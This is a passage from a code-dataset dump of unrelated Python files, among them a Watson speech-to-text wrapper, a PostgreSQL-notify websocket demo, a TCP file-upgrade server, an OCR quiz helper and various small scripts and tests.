logger=remove_actions.get_logger())\n","sub_path":"sequere/contrib/timeline/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"163203140","text":"import jsonpickle\nfrom pyspark import SparkContext\nfrom pyspark import SparkConf\nimport sys\n\n\ndef run(sc, in_handle, out_handle):\n\n df = sc.textFile(str(in_handle))\n\n entire_kv_store = df.flatMap(jsonpickle.decode)\n\n edges = entire_kv_store\\\n .filter(lambda x: x[0] == 'own_edge')\\\n .map(lambda x: x[1])\n\n taint = entire_kv_store\\\n .filter(lambda x: x[0] == 'own_taint')\\\n .map(lambda x: x[1])\n\n neighbor_taint = edges.map(lambda x: (x[1], x[0]))\\\n .join(taint)\\\n .map(lambda x: (x[1][0], x[1][1]))\n\n updated_taint = taint.union(neighbor_taint)\\\n .reduceByKey(lambda x, y: x + y - x * y)\\\n .map(lambda x: ('own_taint', x))\n\n updated_kv_store = entire_kv_store\\\n .filter(lambda x: x[0] != 'own_taint')\\\n .union(updated_taint)\\\n .collect()\n\n out_handle.write(updated_kv_store)\n\nrun(sc, in_handle, out_handle)\n","sub_path":"src/example-tasks/reachability-mr.py","file_name":"reachability-mr.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"566155499","text":"import sys\n\ndef encode(input_enc, output_enc, word):\n encoding_values = ['utf8', 'bw', 'sbw']\n mode = input_enc + '_' + output_enc\n\n utf8 = u'\\u0621\\u0622\\u0623\\u0624\\u0625\\u0626\\u0627\\u0628\\u0629\\u062A\\u062B\\u062C\\u062D\\u062E\\u062F\\u0630\\u0631\\u0632\\u0633\\u0634\\u0635\\u0636\\u0637\\u0638\\u0639\\u063A\\u0640\\u0641\\u0642\\u0643\\u0644\\u0645\\u0646\\u0647\\u0648\\u0649\\u064A\\u064B\\u064C\\u064D\\u064E\\u064F\\u0650\\u0651\\u0652\\u0670\\u0671'\n bw = \"'|>&<}AbptvjHxd*rzs$SDTZEg_fqklmnhwYyFNKaui~o`{\"\n sbw = \"CMOWIQAbptvjHxdVrzscSDTZEg_fqklmnhwYyFNKauiXoeL\"\n\n\n if mode == 'utf8_bw':\n utf8_bw = str.maketrans(utf8, bw)\n return word.translate(utf8_bw)\n elif mode == 'utf8_sbw':\n utf8_sbw = str.maketrans(utf8, sbw)\n return word.translate(utf8_sbw)\n \n elif mode == 'bw_utf8':\n bw_utf8 = str.maketrans(bw, utf8)\n return word.translate(bw_utf8)\n elif mode == 'bw_sbw':\n bw_sbw = str.maketrans(bw, sbw)\n return word.translate(bw_sbw)\n \n elif mode == 'sbw_utf8':\n sbw_utf8 = str.maketrans(sbw, utf8)\n return word.translate(sbw_utf8)\n elif mode == 'sbw_bw':\n sbw_bw = str.maketrans(sbw, bw)\n return word.translate(sbw_bw)\n \n else:\n if input_enc not in encoding_values:\n print('Input encoding ' + input_enc + ' is not valid.')\n if output_enc not in encoding_values:\n print('Output encoding ' + output_enc + ' is not valid.')\n sys.exit(2)\n\n\ndef encode_file(input_enc, output_enc, input_file):\n try:\n text_file = open(input_file, 'r').read()\n out_text = open(input_file + '.' + output_enc, 'w')\n out_text.write(encode(input_enc, output_enc, text_file))\n out_text.close()\n except IOError as err:\n print(\"File cannot be opened!\")\n sys.exit(2)\n\n\nif __name__ == \"__main__\":\n encode_file('utf8', 'bw', 'example.txt')\n ","sub_path":"web-player/dialogue-manager/miscellaneous/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"52466970","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport curses\n\n# 初始化curses\nscreen = curses.initscr()\n# 设置不回显\n# curses.noecho()\n# 设置不需要按回车立即响应\n# curses.cbreak()\n# 开启键盘模式\nscreen.keypad(1)\n\n# 阻塞模式读取0 非阻塞 1\nscreen.nodelay(0)\n\nwhile True:\n char = screen.getch()\n # 根据得到的值进行操作\n # 无值为-1 其他为keyCode\n\n# 恢复控制台默认设置(若不恢复,会导致即使程序结束退出了,控制台仍然是没有回显的)\n# curses.nocbreak()\n# screen.keypad(0)\n# curses.echo()\n# # 结束窗口\n# curses.endwin()\n","sub_path":"1-python/1-python2/get-keyboard-event/get_Key_Event.py","file_name":"get_Key_Event.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"217064540","text":"#Leon Oram\r\n#16-12-2014\r\n#Dev task 1\r\n\r\nimport random\r\n\r\n\r\ndef ask(select,caps,countr):\r\n country = countr[select]\r\n capital = caps[select]\r\n answ = input(\"The capital of {0} is ... ? \".format(country))\r\n answ = answ.title()\r\n if answ == capital:\r\n print(\"That is correct!\")\r\n else:\r\n print(\"Incorrect! The capital is\",capital)\r\n \r\n\r\n\r\ndef main():\r\n caps = [\"Ottawa\",\"London\",\"Seoul\",\"Tokyo\",\"Pyongyang\",\"Moscow\",\"Washington\",\"Vatican City\",\"Kingston\",\"Canberra\"]\r\n countr = [\"Canada\",\"The United Kingdom\",\"South Korea\",\"Japan\",\"Best Korea\",\"Russia\",\"The USA\",\"Vatican City\",\"Jamaica\",\"Australia\"]\r\n select = random.randint(1,10)\r\n ask(select,caps,countr)\r\n \r\n \r\nuser = input(\"Please enter your name: \")\r\nuser = user.lower()\r\nif user != \"kieran\":\r\n main()\r\n","sub_path":"Dev 1.py","file_name":"Dev 1.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"208555313","text":"from django.conf.urls import include, url\nfrom . import views\n\nurlpatterns = [\n url(r'^contact', views.contact),\n url(r'^city/(?P\\w+)/', views.city_info),\n url(r'^lokafyer/(?P\\d+)/', views.lokafyer_info),\n url(r'^booking/request', views.booking_request),\n url(r'^booking/payment', views.booking_payment)\n]\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"457144312","text":"# You need to install pyaudio to run this example\n# pip install pyaudio\n\n# When using a microphone, the AudioSource `input` parameter would be\n# initialised as a queue. The pyaudio stream would be continuosly adding\n# recordings to the queue, and the websocket client would be sending the\n# recordings to the speech to text service\n\n# https://stackoverflow.com/questions/6517953/clear-all-items-from-the-queue\n# https://stackoverflow.com/questions/48653745/continuesly-streaming-audio-signal-real-time-infinitely-python\n\nimport time\nimport sys\n\nimport pyaudio\n\nfrom ibm_watson import SpeechToTextV1\nfrom ibm_watson.websocket import RecognizeCallback, AudioSource\nfrom threading import Thread\nfrom ibm_cloud_sdk_core.authenticators import IAMAuthenticator\n\nimport queue\nfrom queue import Empty\n\ntry:\n from Queue import Queue, Full\nexcept ImportError:\n from queue import Queue, Full\n\n###############################################\n#### Initalize queue to store the recordings ##\n###############################################\n\n\nclass stt_watson(object):\n # modifying IBM's class so it can be restarted\n # https://github.com/watson-developer-cloud/python-sdk/blob/master/ibm_watson/websocket/audio_source.py\n class AudioSource2(AudioSource):\n def restart_recording(self):\n self.is_recording = True\n\n # define callback for the speech to text service\n class MyRecognizeCallback(RecognizeCallback):\n def __init__(self, q):\n RecognizeCallback.__init__(self)\n self.transcript = \"no transcript\"\n self.q = q\n self.keep_thread_alive = True\n\n def on_transcription(self, transcript):\n pass\n\n def on_connected(self):\n print('Watson Connection was successful')\n pass\n\n def on_error(self, error):\n print('Watson Error received: {}'.format(error))\n #self.q.put((True, self.transcript))\n #self.q.put((True, \"timeout\"))\n #self.keep_thread_alive = False\n\n def on_inactivity_timeout(self, error):\n print('Watson Inactivity timeout: {}'.format(error))\n #self.q.put((True, self.transcript))\n #self.keep_thread_alive = False\n #thread.exit()\n\n def on_listening(self):\n print('Watson STT is listening...')\n\n def on_hypothesis(self, hypothesis):\n # print(\"hypo: \" + hypothesis)\n pass\n\n def on_data(self, data):\n print(\"ON_DATA:\",data)\n result = data['results'][0]['alternatives'][0]['transcript']\n final = data['results'][0]['final']\n self.transcript = result\n self.q.put((final, result))\n if (final):\n print(\"final: \" + result)\n else:\n print(\"interim: \" + result)\n\n def on_close(self):\n print(\"Watson closed Connection\")\n self.q.put((False, \"connectionClosed\"))\n time.sleep(2)\n self.keep_thread_alive = False\n # self.audio_paused = True\n # with self.q_soc.mutex:\n # self.q_soc.queue.clear()\n #thread.exit()\n\n def __init__(self, iamkey, url, lang, timeout):\n # if url == \"\" or url == \"default\":\n # url = \"https://stream.watsonplatform.net/speech-to-text/api\"\n # print(\"url: \" + url)\n #print(\"key: \" + iamkey)\n # self.speech_to_text = SpeechToTextV1(\n # iam_apikey=iamkey,\n # url=url)\n\n # try: self.thread_running\n # except NameError: self.thread_running = None\n\n print(\"Watson STT INIT STARTED\")\n\n self.iamkey = iamkey\n self.streaming = None\n self.recognize_thread = None\n self.need_restart = False\n\n self.CHUNK = 1024\n # Note: It will discard if the websocket client can't consumme fast enough\n # So, increase the max size as per your choice\n self.BUF_MAX_SIZE = self.CHUNK * 10\n\n # Variables for recording the speech\n self.FORMAT = pyaudio.paInt16\n self.CHANNELS = 1\n self.RATE = 44100\n\n # Buffer to store audio\n self.q_aud = Queue(maxsize=int(round(self.BUF_MAX_SIZE / self.CHUNK)))\n\n # queue for the websocket process to send to main\n self.q_soc = Queue()\n\n # queue to send data from main to websoc thread\n #self.q_proc = Queue()\n authenticator = IAMAuthenticator(self.iamkey)\n # if url == \"\" or url == \"default\":\n # url = \"https://stream.watsonplatform.net/speech-to-text/api\"\n self.speech_to_text = SpeechToTextV1(authenticator=authenticator)\n # Create an instance of AudioSource\n self.audio_source = self.AudioSource2(self.q_aud, True, True)\n # instantiate pyaudio\n self.audio = pyaudio.PyAudio()\n #self.FORMAT = self.audio.get_format_from_width(2)\n\n self.stream = self.audio.open(\n input_device_index = 1,\n format=self.FORMAT,\n channels=self.CHANNELS,\n rate=self.RATE,\n input=True,\n frames_per_buffer=self.CHUNK,\n stream_callback=self.pyaudio_callback,\n start=False\n )\n\n #self.audio_paused = True\n\n self.timeout = timeout\n\n langnew = self.get_lang(lang)\n #timeout = -1 # go forever\n # if hasattr(self,'thread_running'):\n # if not self.thread_running:\n print(\"spawn thread\")\n #self.recognize_thread = Thread(target=self.recog_thread, args=(self.q_soc,self.q_proc, self.audio, self.audio_source, self.stream, langnew, self.timeout))\n self.recognize_thread = Thread(target=self.recog_thread, args=(self.q_soc, self.audio, self.audio_source, self.stream, langnew, self.timeout))\n #recognize_thread.setDaemon(True)\n # self.test_thread = Thread(target=self.test, args=(\"a\"))\n self.recognize_thread.start()\n # self.test_thread.start()\n #self.thread_running = True\n print(\"finished spawn thread\")\n # self.keep_thread_alive = True\n\n def restart(self,langnew):\n # clean up before restarting thread\n\n # Buffer to store audio\n self.q_aud = Queue(maxsize=int(round(self.BUF_MAX_SIZE / self.CHUNK)))\n\n # queue for the websocket process to send to main\n self.q_soc = Queue()\n\n print(\"Restarting...Watson STT\")\n self.stream.stop_stream()\n self.stream.close()\n self.audio.terminate()\n self.audio_source.completed_recording()\n\n time.sleep(0.5)\n\n self.audio_source = self.AudioSource2(self.q_aud, True, True)\n self.audio = pyaudio.PyAudio()\n\n authenticator = IAMAuthenticator(self.iamkey)\n self.speech_to_text = SpeechToTextV1(authenticator=authenticator)\n self.stream = self.audio.open(\n input_device_index = 1,\n format=self.FORMAT,\n channels=self.CHANNELS,\n rate=self.RATE,\n input=True,\n frames_per_buffer=self.CHUNK,\n stream_callback=self.pyaudio_callback,\n start=False\n )\n\n lang = self.get_lang(langnew)\n self.recognize_thread = Thread(target=self.recog_thread, args=(self.q_soc, self.audio, self.audio_source, self.stream, lang, self.timeout))\n #recognize_thread.setDaemon(True)\n self.recognize_thread.start()\n #self.thread_running = True\n\n # define callback for pyaudio to store the recording in queue\n def pyaudio_callback(self, in_data, frame_count, time_info, status):\n try:\n self.q_aud.put(in_data)\n except Full:\n pass # discard\n return (None, pyaudio.paContinue)\n\n # this function will initiate the STT service and pass in the AudioSource\n def recog_thread(self, q_soc, audio, audio_source, stream, lang, timeout):\n print(\"starting Watson STT thread with lang: \" + lang)\n #print(\"lang: \" + lang)\n audio_source.restart_recording()\n stream.start_stream()\n\n mycallback = self.MyRecognizeCallback(q_soc)\n\n while mycallback.keep_thread_alive:\n #while True:\n print(\"recog_thread: starting websocket connection...\")\n try:\n self.speech_to_text.recognize_using_websocket(audio=audio_source,\n content_type='audio/l16; rate=44100',\n model=lang,\n input_device_index=1,\n recognize_callback=mycallback,\n interim_results=True,\n inactivity_timeout=timeout)\n except:\n print(\"Waston disconnected\")\n\n # shut it all down\n print(\"recogize_thread: shutting down...\")\n self.need_restart = True\n # stream.stop_stream()\n # stream.close()\n # audio.terminate()\n # audio_source.completed_recording()\n\n\n def get_lang(self, langnew):\n # https://cloud.ibm.com/docs/services/speech-to-text?topic=speech-to-text-models\n if langnew == \"\" or langnew == \"default\" or langnew == \"enUS\":\n lang = \"en-US_BroadbandModel\"\n elif langnew == \"enGB\":\n lang = \"en-GB_BroadbandModel\"\n elif langnew == \"deDE\":\n lang = \"de-DE_BroadbandModel\"\n elif langnew == \"esES\":\n lang = \"es-ES_BroadbandModel\"\n elif langnew == \"frFR\":\n lang = \"fr-FR_BroadbandModel\"\n elif langnew == \"koKR\":\n lang = \"ko-KR_BroadbandModel\"\n else:\n lang = \"en-US_BroadbandModel\"\n\n self.lang = langnew\n return lang\n\n ###############################################\n #### Initiate recognition ########\n ###############################################\n def transcribe(self, lang, time_limit):\n\n # if self.audio_paused:\n # print(\"transribe: restart\")\n # # self.stream.stop_stream()\n # #self.stream.start_stream()\n # # self.audio_paused = False\n # # self.thread_running = True\n # # self.keep_thread_alive = True\n # self.restart(lang)\n\n # if lang != self.lang or not self.thread_running:\n print(\"restart needed: \",self.need_restart)\n if lang != self.lang or self.need_restart:\n # print(\"Current language is: \" + self.lang + \" new lang is: \" + lang)\n # print(\"should be: restarting this process to change languages\")\n self.restart(lang)\n time.sleep(2)\n self.need_restart = False\n else:\n self.stream.start_stream()\n\n\n\n transcript = \"no transcription\"\n print(\"starting transcription...\")\n try:\n # recognize_thread = Thread(target=self.recognize_using_weboscket, args=(self.q,self.audio_source, lang, time_limit))\n # #recognize_thread.setDaemon(True)\n # recognize_thread.start()\n #self.recognize_using_weboscket(q,self.audio_source, lang, timeout)\n timeout = time.time() + time_limit\n print(time.time(),timeout)\n transcript = \"no transcription\"\n #status = False\n #while status == False and time.time() < timeout:\n #message = self.q_soc.get(True,1)\n self.q_soc.queue.clear()\n self.q_aud.queue.clear()\n while time.time() < timeout:\n try:\n message = self.q_soc.get(True,2)\n if message != None:\n print(\"Watson STT message:\",message[0],message[1])\n if message[0]:\n transcript = message[1]\n print(\"got a final: \" + transcript)\n break\n else:\n print(\"got an interim: \" + transcript)\n transcript = message[1]\n if message[1] == \"connectionClosed\":\n print(message[1],\"exiting due to Watson closing...\")\n self.need_restart = True\n break\n\n # if transcript == \"timeout\":\n # status = True\n # #transcript = \"no transcription\"\n # print(\"recognize: TIMEOUT\")\n # #self.thread_running = False\n\n except Empty:\n #except:\n pass\n #time.sleep(0.001)\n\n # if time.time() >= timeout:\n print(\"Completed transcribe()...\",time.time(),timeout)\n\n except BaseException as e:\n #except:\n print('Error: ' + str(e))\n print(\"all done...\")\n finally:\n print(\"Exiting transcribe()...\")\n self.stream.stop_stream()\n # self.audio_paused = True\n #self.stream.close()\n # self.audio.terminate()\n # self.audio_source.completed_recording()\n\n return transcript\n #sys.exit()\n","sub_path":"raspi/delft-ai-toolkit/speech_to_text_watson-pause.py","file_name":"speech_to_text_watson-pause.py","file_ext":"py","file_size_in_byte":13030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"191062856","text":"import psycopg2\nfrom psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT\nfrom .models import *\nfrom django.db.models import Avg\nimport eventlet\nfrom eventlet import wsgi\nfrom eventlet import websocket\nfrom eventlet.hubs import trampoline\n\ndbname = 'seller_perf_tool'\nhost = 'localhost'\nuser = 'postgres'\npassword = 'postgres123'\n\ndsn = 'dbname=%s host=%s user=%s password=%s' % (dbname, host, user, password)\n\ndef func1():\n return Marks.objects.all().aggregate(Avg('english'))['english__avg']\n\ndef dblisten(q):\n \"\"\"\n Open a db connection and add notifications to *q*.\n \"\"\"\n cnn = psycopg2.connect(dsn)\n cnn.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)\n cur = cnn.cursor()\n cur.execute(\"LISTEN tester;\")\n while 1:\n trampoline(cnn, read=True)\n cnn.poll()\n while cnn.notifies:\n n = cnn.notifies.pop()\n q.put(n)\n\n@websocket.WebSocketWSGI\ndef handle(ws):\n \"\"\"\n Receive a connection and send it database notifications.\n \"\"\"\n q = eventlet.Queue()\n eventlet.spawn(dblisten, q)\n while 1:\n n = q.get()\n avg = func1()\n print(avg)\n print(n)\n #ws.send(n.payload)\n ws.send(str(avg))\n\ndef dispatch(environ, start_response):\n if environ['PATH_INFO'] == '/tester':\n return handle(environ, start_response)\n else:\n start_response('200 OK',\n [('content-type', 'text/html')])\n return [page]\n\ndef run():\n listener = eventlet.listen(('127.0.0.1', 8080))\n wsgi.server(listener, dispatch)\n\n\npage = \"\"\"\n\n pushdemo\n \n \n \n \n \n
\n
 
\n
 
\n
 
\n
\n\n
\n \n\n\"\"\"","sub_path":"performance_app/pubsub.py","file_name":"pubsub.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"566471081","text":"\"\"\"Custom template tags that provide utility functionality.\"\"\"\n\nimport json\n\nfrom django import template\n\nregister = template.Library()\n\n\n@register.filter\ndef asjson(json_str):\n \"\"\"Convert the given JSON object into a string.\"\"\"\n if json_str is None:\n json_str = 'null'\n elif not isinstance(json_str, (bytes, str)):\n json_str = json.dumps(json_str)\n\n return json_str\n","sub_path":"calchart/calchart/templatetags/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"226525546","text":"# import json\n\nfrom django.core.files import File\nfrom tcp.protocol import *\nfrom tcp.db import DBEngine\nimport pymysql.err\n\n\nclass UpgradeBase(Exception):\n \"\"\"Exception related to operation with Upgrade\"\"\"\n\n\nclass UpdateSendOrderError(UpgradeBase):\n \"\"\"SendOrder not quual\"\"\"\n\n\nclass UpdateFileNotFoundError(UpgradeBase):\n \"\"\"升级文件时,把文件删除\"\"\"\n\n\nclass UpdateFile(object):\n def __init__(self, db_file):\n # django orm返回的文件域对象\n # self.db_file = db_file\n self.filename = db_file.ufile.name\n self.filesize = db_file.ufile.size\n self.filepath = db_file.ufile.path\n self.sendorder = 0\n # 整个文件大小\n\n # 每次要发送的程序块大小\n self.chunksize = 7\n # 已经发送的大小\n self.sendalredy = 0\n self.finish = 0\n\n def getFileName(self):\n return self.filename.split('./')[1]\n\n def getFileSize(self):\n return self.filesize\n\n def getFilePath(self):\n return self.filepath\n\n def getSendOrder(self):\n return self.sendorder\n\n # 关闭文件需重新从数据库内获取\n def getNextSendChunk(self, sorder):\n self._setSendOrder(sorder)\n with open(self.filepath) as f:\n f.seek(self.sendalredy)\n self._setSendAlready()\n chunksize = self._getSendSize()\n return f.read(chunksize), chunksize\n\n def _setSendOrder(self, sorder):\n if self.sendorder == sorder:\n self.sendorder += 1\n else:\n raise UpdateSendOrderError\n\n def _setSendAlready(self):\n self.sendalredy += self.chunksize\n if self.sendalredy >= self.filesize:\n self.sendalredy = self.filesize\n self.finish = 1\n\n def _getSendSize(self):\n if self.sendalredy == self.filesize:\n return self.sendalredy - self.chunksize * (self.sendorder - 1)\n return self.chunksize\n\n def getNext(self, order):\n # 第一次不管收到什么发送第一部分数据\n if self.sendorder == 0:\n pass\n else:\n # 判断收到的顺序是否跟自己发的一致\n if self.sendorder != order:\n raise UpdateSendOrderError\n self.sendorder += 1\n try:\n with open(self.filepath) as f:\n f.seek(self.sendalredy)\n self._setSendAlready()\n chunksize = self._getSendSize()\n return f.read(chunksize), chunksize\n except FileNotFoundError:\n raise UpdateFileNotFoundError\n\n\nclass UpgradeCode(object):\n def __init__(self):\n self.dbEngine = DBEngine()\n self.updateFile = None\n\n @staticmethod\n def findBadInput(inputString):\n if '\\'' in inputString or '\\\"' in inputString \\\n or '`' in inputString or ' ' in inputString:\n return True\n\n def handlePackge(self, connection, packge):\n if isinstance(packge, PackgeQuery):\n self.handleQuery(connection, packge)\n\n elif isinstance(packge, PackgeUpgrade):\n self.handleUpgrade(connection, packge)\n\n def handleQuery(self, connection, packge):\n\n retPackge = SendToClientPackge('check')\n # if self.findBadInput(packge.username) or self.findBadInput(packge.softversion):\n # retPackge.errcode = PACKAGE_ERRCODE_INPUTWRONG\n\n db_file = self.dbEngine.getNewFileWithCodeType(packge.codetype)\n if db_file:\n self.updateFile = UpdateFile(db_file)\n retPackge.status = 1\n fname = self.updateFile.getFileName()\n fsize = self.updateFile.getFileSize()\n retPackge.obj = SendToClientPackgeQuery(fname, fsize)\n\n else:\n retPackge.errcode = PACKAGE_ERRCODE_NOUPDATEAVAILABLE\n\n connection.send_message(json.dumps(retPackge, cls=ComplexEncoder))\n\n def handleUpgrade(self, connection, packge):\n retPackge = SendToClientPackge('load')\n if self.updateFile:\n if not self.updateFile.finish:\n try:\n chunk, chunksize = self.updateFile.getNext(packge.forder)\n retPackge.status = 1\n retPackge.obj = SendToClientPackgeUpgrade(chunk, self.updateFile.sendorder, chunksize)\n except UpdateSendOrderError:\n retPackge.errcode = PACKAGE_ERRCODE_SENDORDERERROR\n except UpdateFileNotFoundError:\n retPackge.errcode = PACKAGE_ERRCODE_INTTERNALERROR\n\n else:\n retPackge.errcode = PACKAGE_ERRCODE_NOTHINGLEFT\n\n else:\n retPackge.errcode = PACKAGE_ERRCODE_NOCHECKNEW\n\n connection.send_message(json.dumps(retPackge, cls=ComplexEncoder))\n","sub_path":"InternalServer/tcp/updatefile.py","file_name":"updatefile.py","file_ext":"py","file_size_in_byte":4798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"438481709","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport re\n# import os\nimport win32gui, win32ui, win32con, win32api\nfrom PIL import Image\nimport pytesseract\n\ndef binarizing(img,threshold): #二值化\n pix_data = img.load()\n w, h = img.size\n for y in range(h):\n for x in range(w):\n if pix_data[x, y] < threshold:\n pix_data[x, y] = 0\n else:\n pix_data[x, y] = 255\n return img\n\ndef window_capture(filename1, filename2):\n hwnd = 0\n hwndDC = win32gui.GetWindowDC(hwnd)\n mfcDC = win32ui.CreateDCFromHandle(hwndDC)\n saveDC = mfcDC.CreateCompatibleDC()\n saveBitMap = win32ui.CreateBitmap()\n # MoniterDev = win32api.EnumDisplayMonitors(None, None)\n # w = MoniterDev[0][2][2]\n # h = MoniterDev[0][2][3]\n w1 = 380\n h1 = 150\n w2 = 380\n h2 = 190\n height = 200\n saveBitMap.CreateCompatibleBitmap(mfcDC, w1, h1)\n saveDC.SelectObject(saveBitMap)\n saveDC.BitBlt((0, 0), (w1, h1), mfcDC, (20, height), win32con.SRCCOPY)\n saveBitMap.SaveBitmapFile(saveDC, filename1)\n saveBitMap.CreateCompatibleBitmap(mfcDC, w2, h2)\n saveDC.SelectObject(saveBitMap)\n saveDC.BitBlt((0, 0), (w2, h2), mfcDC, (20, h1 + height), win32con.SRCCOPY)\n saveBitMap.SaveBitmapFile(saveDC, filename2)\n\n\n# 冲顶大会 170 上无篮框 200 上有篮框\n# 花椒直播-百万赢家 166 上无框 170 上有框\ndef ocr():\n window_capture('Que_ocr.jpg', 'Ans_ocr.jpg')\n Que_img = Image.open('Que_ocr.jpg')\n Que_ocr = pytesseract.image_to_string(Que_img, lang='chi_sim').replace(' ', '').replace('\\n',\n '')\n try:\n Que_ocr = re.findall('(?<=\\d\\.).*', Que_ocr)[0]\n except:\n Que_ocr = Que_ocr\n\n Ans_img = Image.open('Ans_ocr.jpg')\n # Ans_img = Ans_img.convert('L') #灰度化\n # Ans_img = binarizing(Ans_img, 206) #可调参数\n # Ans_img.save('Ans_ocr2.jpg')\n Ans_ocr = pytesseract.image_to_string(Ans_img, lang='chi_sim').replace(' ', '').split('\\n')\n Ans_ocr = [x for x in Ans_ocr if x != '']\n return Que_ocr, Ans_ocr\n\n\ndef p_it(Que_ocr, Ans_ocr):\n print(Que_ocr)\n for i in range(len(Ans_ocr)):\n print('{}: {}'.format(i + 1, Ans_ocr[i]))\n print('')\n\nif __name__ == '__main__':\n Que = '新装修的房子通常哪种化学物质含量会比较高?'\n Ans = ['甲醛', '苯', '甲醇']\n p_it(Que, Ans)","sub_path":"python_dt/common/screen_ocr.py","file_name":"screen_ocr.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"77582308","text":"# leetcode - https://leetcode.com/problems/permutation-sequence/\nclass Solution:\n def getPermutation(self, n: int, k: int) -> str:\n nums=list(range(1,n+1))\n permutation=''\n k-=1\n while n>0:\n n-=1\n index,k=divmod(k,math.factorial(n))\n permutation+=str(nums[index])\n nums.remove(nums[index])\n return permutation\n","sub_path":"leetcode/permutationSequence.py","file_name":"permutationSequence.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"515672158","text":"from datetime import date\n\n\nclass Game(object):\n __slots__ = 'redPlayer', 'redScore', 'bluePlayer', 'blueScore', 'time', 'skillChangeToBlue', 'redPosChange', 'redPosAfter', 'bluePosChange', 'bluePosAfter', 'redAchievements', 'blueAchievements', 'deletedBy', 'deletedAt'\n\n def __init__(self, redPlayer, redScore, bluePlayer, blueScore, time):\n self.redPlayer = redPlayer\n self.redScore = int(redScore)\n self.bluePlayer = bluePlayer\n self.blueScore = int(blueScore)\n self.time = int(time)\n self.skillChangeToBlue = 0\n self.redPosChange = None\n self.redPosAfter = None\n self.bluePosChange = None\n self.bluePosAfter = None\n self.redAchievements = None\n self.blueAchievements = None\n self.deletedBy = None\n self.deletedAt = None\n\n def isDeleted(self):\n return self.deletedAt is not None\n\n def timeAsDate(self):\n return date.fromtimestamp(self.time)\n","sub_path":"tntfl/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"273176212","text":"from operator import itemgetter\n\nimport numpy as np\n\n\nfrom pytest import mark\nparametrize = mark.parametrize\n\nfrom .. core import system_of_units as units\n\nfrom . import pmaps_functions as pmapf\nfrom . pmaps_functions import df_to_pmaps_dict\nfrom . pmaps_functions import df_to_s2si_dict\n\n\ndef test_integrate_charge():\n sipms = {1000: range(5),\n 1001: range(10)}\n charges = np.array([[1000,1001],[10,45]])\n charges_test = pmapf.integrate_charge(sipms)\n np.testing.assert_array_equal(charges, charges_test)\n\n\ndef test_width():\n initial_time = 10000\n width = 1000\n times = range(10000,initial_time + width+1)\n # Convert times to ns\n times = list(map(lambda t: t * units.ns, times))\n assert width == pmapf.width(times)\n assert width * units.ns / units.mus == pmapf.width(times, to_mus=True)\n\n\ndef test_load_pmaps(KrMC_pmaps):\n\n _, (s1t, s2t, s2sit), (_, _, _), (s1, s2, s2si) = KrMC_pmaps\n S1 = df_to_pmaps_dict(s1t)\n S2 = df_to_pmaps_dict(s2t)\n S2Si = df_to_s2si_dict(s2sit)\n\n for event, s1d in S1.items():\n for i, (t, E) in s1d.items():\n assert np.allclose(t, s1[event][i][0], rtol=1e-4)\n assert np.allclose(E, s1[event][i][1], rtol=1e-4)\n\n for event, s2d in S2.items():\n for i, (t, E) in s2d.items():\n assert np.allclose(t, s2[event][i][0], rtol=1e-4)\n assert np.allclose(E, s2[event][i][1], rtol=1e-4)\n\n for event, s2sid in S2Si.items():\n for i, sipm in s2sid.items():\n for nsipm, E in sipm.items():\n assert np.allclose(E, s2si[event][i][nsipm], rtol=1e-4)\n\n\n\n###############################################################\n# df_to_pmaps_dict-related tests\n###############################################################\ndef test_df_to_pmaps_dict_limit_events(KrMC_pmaps):\n max_events = 30\n _, (s1s, s2s, s2sis), (S1_evts, _, _), _ = KrMC_pmaps\n s1dict = df_to_pmaps_dict(s1s, max_events)\n s2dict = df_to_pmaps_dict(s2s, max_events)\n assert sorted(s1dict.keys()) == S1_evts[:7]\n assert sorted(s2dict.keys()) == []\n\n\ndef test_df_to_pmaps_dict_take_all_events_if_limit_too_high(KrMC_pmaps):\n max_events_is_more_than_available = 10000\n _, (s1s, s2s, s2sis), (S1_evts, S2_evts, _), _ = KrMC_pmaps\n s1dict = df_to_pmaps_dict(s1s, max_events_is_more_than_available)\n s2dict = df_to_pmaps_dict(s2s, max_events_is_more_than_available)\n assert sorted(s1dict.keys()) == S1_evts\n assert sorted(s2dict.keys()) == S2_evts\n\n\ndef test_df_to_pmaps_dict_default_number_of_events(KrMC_pmaps):\n # Read all events\n _, (s1s, s2s, s2sis), (S1_evts, S2_evts, _), _ = KrMC_pmaps\n s1dict = df_to_pmaps_dict(s1s)\n s2dict = df_to_pmaps_dict(s2s)\n assert sorted(s1dict.keys()) == S1_evts\n assert sorted(s2dict.keys()) == S2_evts\n\n\ndef 